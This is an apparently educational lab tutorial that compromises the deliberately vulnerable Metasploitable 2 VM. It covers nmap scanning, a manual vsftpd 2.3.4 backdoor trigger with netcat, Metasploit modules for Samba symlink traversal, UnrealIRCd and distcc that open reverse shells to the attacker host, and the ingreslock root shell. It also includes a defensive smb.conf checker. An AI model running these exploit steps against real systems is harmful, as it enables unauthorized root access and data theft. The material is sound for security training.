Intro
In this tutorial we will be attacking some of the simpler services on Metasploitable 2. The goal of each attack is to gain access to the server, either as root or with a foothold that could be used to escalate to root.
Our lab is configured with the below machines.
- Kali Linux 2016.2 – 172.28.128.6
- Metasploitable 2 – 172.28.128.7
Port Scanning
To find what services are accessible on Metasploitable 2, we are going to use nmap.
Nmap is a very powerful tool with far more capability than we use here; I would highly suggest learning about its abilities and getting comfortable using it (nmap cheat sheet here).
The scan we run today returns a list of open TCP ports. By default nmap only checks the 1000 most common ports, so we scan the full range with the -p0-65535 option as seen below (UDP services are not covered by this scan).
root@kali:~# nmap -p0-65535 172.28.128.7
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-01 22:25 EDT
Nmap scan report for 172.28.128.7
Host is up (0.0012s latency).
Not shown: 65506 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
6697/tcp open unknown
8009/tcp open ajp13
8180/tcp open unknown
8787/tcp open unknown
33779/tcp open unknown
39841/tcp open unknown
47948/tcp open unknown
52448/tcp open unknown
MAC Address: 08:00:27:0F:B6:3F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds
OK, so now we have a list of open ports. Let's start looking at whether any of them can be used to gain access.
FTP Service Port 21
So we are going to run nmap again, but this time we are going to target the FTP service.
To do this, we will run nmap -sV -p 21 172.28.128.7
- -sV enables version detection, so nmap reports the service name and version it reads from the banner
- -p 21 limits the scan to port 21 (FTP)
- 172.28.128.7 is our Metasploitable 2 target
root@kali:~# nmap -sV -p 21 172.28.128.7
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-01 22:42 EDT
Nmap scan report for 172.28.128.7
Host is up (0.0019s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
MAC Address: 08:00:27:0F:B6:3F (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.45 seconds
So as you can see above, nmap has detected that Metasploitable 2 is running vsFTPd 2.3.4.
For a few days in mid-2011 the vsFTPd 2.3.4 source archive on the project's download site was replaced with a backdoored copy, and Metasploitable 2 ships that backdoored build. The backdoor is activated by logging in with a username that contains the two characters :) and, once activated, it spawns a root shell listening on TCP port 6200. Metasploit has an exploit module for this (exploit/unix/ftp/vsftpd_234_backdoor), but we will perform the attack manually as it is easy to trigger.
First, we will connect to the FTP service on port 21 with netcat and log in with the special username. The username does not have to belong to a valid account and the password can be anything. The backdoor fires while the PASS command is being processed, so that command never gets a reply; once the connection hangs, break out with Ctrl-C (the ^C below).
root@kali:~# nc 172.28.128.7 21
220 (vsFTPd 2.3.4)
USER fake:)
331 Please specify the password.
PASS account
^C
Now that we have triggered the backdoor, we connect to port 6200 and check our access. The shell gives no prompt, so just type the commands.
root@kali:~# nc 172.28.128.7 6200
id
uid=0(root) gid=0(root)
whoami
root
So as you can see above, we have gained root access on the server by using the FTP backdoor. The shell is spawned by vsftpd's privileged process, which is why it runs as root rather than as the ftp user. Note that the listener on 6200 serves a single connection: once you exit that shell, the backdoor has to be triggered again.
SMB File System Access Port 445
Next we will work on gaining file system access rather than a shell.
When Samba is configured with a writeable share and has wide links enabled (the default before Samba 3.4.6) alongside Unix extensions, a client can create a symlink inside the share that points outside it, and Samba will follow it. This directory traversal (CVE-2010-0926) turns a harmless-looking writeable share into a window onto the whole file system. Metasploit makes the flaw easy to exploit, as it has a built-in module that creates the symlink so we can browse the root file system.
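Since the flaw is a configuration weakness, here is an added example (not code from the original post or from Samba) that checks an smb.conf for the combination the module needs: wide links and Unix extensions in [global] plus a writeable share. The two configs at the bottom are constructed for the demonstration and are not Metasploitable 2's real smb.conf.

```python
import configparser

TRUE_VALUES = {"yes", "true", "1"}


def _flag(value, default: bool) -> bool:
    """Samba boolean parameter; None means the parameter is absent, so the default applies."""
    if value is None:
        return default
    return value.strip().lower() in TRUE_VALUES


def parse_smb_conf(text: str) -> configparser.ConfigParser:
    """smb.conf is INI-like; parameter names ignore case and internal spaces."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = lambda name: name.replace(" ", "").lower()
    cp.read_string("\n".join(line.strip() for line in text.splitlines()))  # drop indentation
    return cp


def share_is_writeable(share) -> bool:
    for key in ("writeable", "writable", "writeok"):  # synonyms in smb.conf
        if key in share:
            return _flag(share[key], False)
    if "readonly" in share:
        return not _flag(share["readonly"], True)
    return False  # Samba default is read only = yes


def symlink_traversal_exposure(text: str, legacy_defaults: bool = True) -> list:
    """Shares a client could symlink out of, the way the Metasploit module does.
    legacy_defaults=True models Samba before 3.4.6, where 'wide links' defaulted to yes."""
    cp = parse_smb_conf(text)
    glob = cp["global"] if cp.has_section("global") else {}
    wide_links = _flag(glob.get("widelinks"), legacy_defaults)
    unix_ext = _flag(glob.get("unixextensions"), True)  # lets the client create the symlink
    if not (wide_links and unix_ext):
        return []
    findings = []
    for name in cp.sections():
        if name == "global":
            continue
        share = cp[name]
        if not _flag(share.get("widelinks"), wide_links):  # per-share override
            continue
        if share_is_writeable(share):
            guest = _flag(share.get("guestok"), False) or _flag(share.get("public"), False)
            findings.append({"share": name, "guest": guest})
    return findings


# Constructed sample config for the check (not Metasploitable 2's actual smb.conf).
WEAK_CONF = """
[global]
   workgroup = WORKGROUP
   security = share

[tmp]
   comment = oh noes!
   path = /tmp
   writeable = yes
   guest ok = yes

[opt]
   path = /opt
   read only = no

[print$]
   path = /var/lib/samba/printers
   read only = yes
"""

# Same shares with the global setting that Samba 3.4.6 and later enforce by default.
FIXED_CONF = WEAK_CONF.replace("[global]", "[global]\n   unix extensions = yes\n   wide links = no")
```

On the weak config the check reports tmp (guest-writeable, the share the module used) and opt; with `wide links = no` in [global] nothing is reported, and the same is true on a newer Samba where the old default no longer applies. Removing write access or guest access from the share narrows the exposure but does not remove the traversal for authenticated users.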
We will start by enumerating SMB shares. To do this we will run smbclient -L //172.28.128.7
smbclient asks for the password of the current local user, root in our case (which is why it says root's password); it is not the target's root password. As we don't know any password, we just hit Enter, and the server falls back to an anonymous (guest) login.
root@kali:~# smbclient -L //172.28.128.7
WARNING: The "syslog" option is deprecated
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
Server Comment
--------- -------
METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)
Workgroup Master
--------- -------
WORKGROUP
Now that we have the names of some shares, we will use the Metasploit auxiliary module auxiliary/admin/smb/samba_symlink_traversal to gain access. The share we will go after is tmp, because the module needs a share it can write to.
root@kali:~# msfconsole
-- snip --
msf > use auxiliary/admin/smb/samba_symlink_traversal
msf auxiliary(samba_symlink_traversal) > set RHOST 172.28.128.7
RHOST => 172.28.128.7
msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf auxiliary(samba_symlink_traversal) > exploit
[*] 172.28.128.7:445 - Connecting to the server...
[*] 172.28.128.7:445 - Trying to mount writeable share 'tmp'...
[*] 172.28.128.7:445 - Trying to link 'rootfs' to the root filesystem...
[*] 172.28.128.7:445 - Now access the following share to browse the root filesystem:
[*] 172.28.128.7:445 - \\172.28.128.7\tmp\rootfs\
[*] Auxiliary module execution completed
msf auxiliary(samba_symlink_traversal) > exit
OK, so we have used Metasploit to create a symlink called rootfs inside the share that points at /. Now let's connect to the tmp share and see if we can reach the root file system through it.
root@kali:~# smbclient //172.28.128.7/tmp
WARNING: The "syslog" option is deprecated
Enter root's password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]
smb: \> cd rootfs
smb: \rootfs\> ls
. DR 0 Sun May 20 14:36:12 2012
.. DR 0 Sun May 20 14:36:12 2012
initrd DR 0 Tue Mar 16 18:57:40 2010
media DR 0 Tue Mar 16 18:55:52 2010
bin DR 0 Sun May 13 23:35:33 2012
lost+found DR 0 Tue Mar 16 18:55:15 2010
mnt DR 0 Wed Apr 28 16:16:56 2010
sbin DR 0 Sun May 13 21:54:53 2012
initrd.img R 7929183 Sun May 13 23:35:56 2012
home DR 0 Fri Apr 16 02:16:02 2010
lib DR 0 Sun May 13 23:35:22 2012
usr DR 0 Wed Apr 28 00:06:37 2010
proc DR 0 Thu Jun 1 22:54:59 2017
root DR 0 Thu Jun 1 23:24:33 2017
sys DR 0 Thu Jun 1 22:55:00 2017
boot DR 0 Sun May 13 23:36:28 2012
nohup.out R 10147 Thu Jun 1 23:24:33 2017
etc DR 0 Thu Jun 1 23:24:29 2017
dev DR 0 Thu Jun 1 22:55:14 2017
vmlinuz R 1987288 Thu Apr 10 12:55:41 2008
opt DR 0 Tue Mar 16 18:57:39 2010
var DR 0 Sun May 20 17:30:19 2012
cdrom DR 0 Tue Mar 16 18:55:51 2010
tmp D 0 Fri Jun 2 00:27:18 2017
srv DR 0 Tue Mar 16 18:57:38 2010
7282168 blocks of size 1024. 5427604 blocks available
smb: \rootfs\>
As you can see above, we can browse the root file system. From here we could download any file the Samba guest account can read, and potentially upload files into writeable locations. This is not directly root access, but it could be used to find readable SSH private keys or configuration files holding credentials that let us log in, possibly as root.
Unreal IRCd Port 6667
Next we are going to run another nmap version scan, this time on the IRC port. To do this we will run nmap -sV 172.28.128.7 -p 6667
root@kali:~# nmap -sV 172.28.128.7 -p 6667
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-06-02 00:32 EDT
Nmap scan report for 172.28.128.7
Host is up (0.0024s latency).
PORT STATE SERVICE VERSION
6667/tcp open irc Unreal ircd
MAC Address: 08:00:27:0F:B6:3F (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.Metasploitable.LAN
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.51 seconds
So as you can see above, Metasploitable 2 is running Unreal IRCd. Nmap does not report the version here, but the build on Metasploitable 2 is 3.2.8.1.
The Unreal3.2.8.1.tar.gz archive on the project's mirrors was replaced with a trojaned copy that sat there between November 2009 and June 12th 2010; the trojan hands any line it receives that starts with AB; to system(), so everything after the semicolon runs as a shell command. We will use a Metasploit module to see if we can exploit this backdoor.
root@kali:~# msfconsole
--snip--
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 172.28.128.7
RHOST => 172.28.128.7
msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse TCP double handler on 172.28.128.6:4444
[*] 172.28.128.7:6667 - Connected to 172.28.128.7:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 172.28.128.7:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NpX7wQfji4YPyYCu;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NpX7wQfji4YPyYCu\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.28.128.6:4444 -> 172.28.128.7:36515) at 2017-06-02 00:39:38 -0400
id
uid=0(root) gid=0(root)
whoami
root
So as you can see above, we have gained root access through the backdoor in Unreal IRCd; the daemon on Metasploitable 2 runs as root, so the injected command does too.
Distcc Test System Vulnerability Port 3632
Something we noticed in the original nmap scan was a service on port 3632 that nmap identified as distccd. distccd accepts compile jobs from the network with no authentication and runs whatever "compiler" the client names (CVE-2004-2687), and as you can see in the snippet below, Metasploit contains an exploit for this service.
root@kali:~# msfconsole
--snip--
msf > search distcc
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(distcc_exec) > set RHOST 172.28.128.7
RHOST => 172.28.128.7
msf exploit(distcc_exec) > exploit
[*] Started reverse TCP double handler on 172.28.128.6:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zDMeZQtLVdMlifCP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "zDMeZQtLVdMlifCP\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.28.128.6:4444 -> 172.28.128.7:36978) at 2017-06-02 00:47:52 -0400
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
whoami
daemon
And there we have it. Another remote shell. This time we do not have root, because distccd runs as the daemon user, but we still have a foothold from which to enumerate the box and eventually escalate to root.
Ingreslock backdoor Port 1524
This is by far the easiest way to gain root access on Metasploitable 2.
All you need to do is connect to the port with netcat and you have root: the "ingreslock" entry is simply a root shell bound to TCP port 1524 by inetd. The command that we will run is nc 172.28.128.7 1524.
root@kali:~# nc 172.28.128.7 1524
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/#
Summary
Metasploitable 2 is a very good test bed if you are just getting into hacking, or if you would like to test your skills and see how much you can do by yourself before researching whether you missed anything.
At the end of the day, we have only uncovered a small number of the flaws in Metasploitable 2, and we will without a doubt be doing more articles in the future covering other vulnerabilities in this fantastic VM.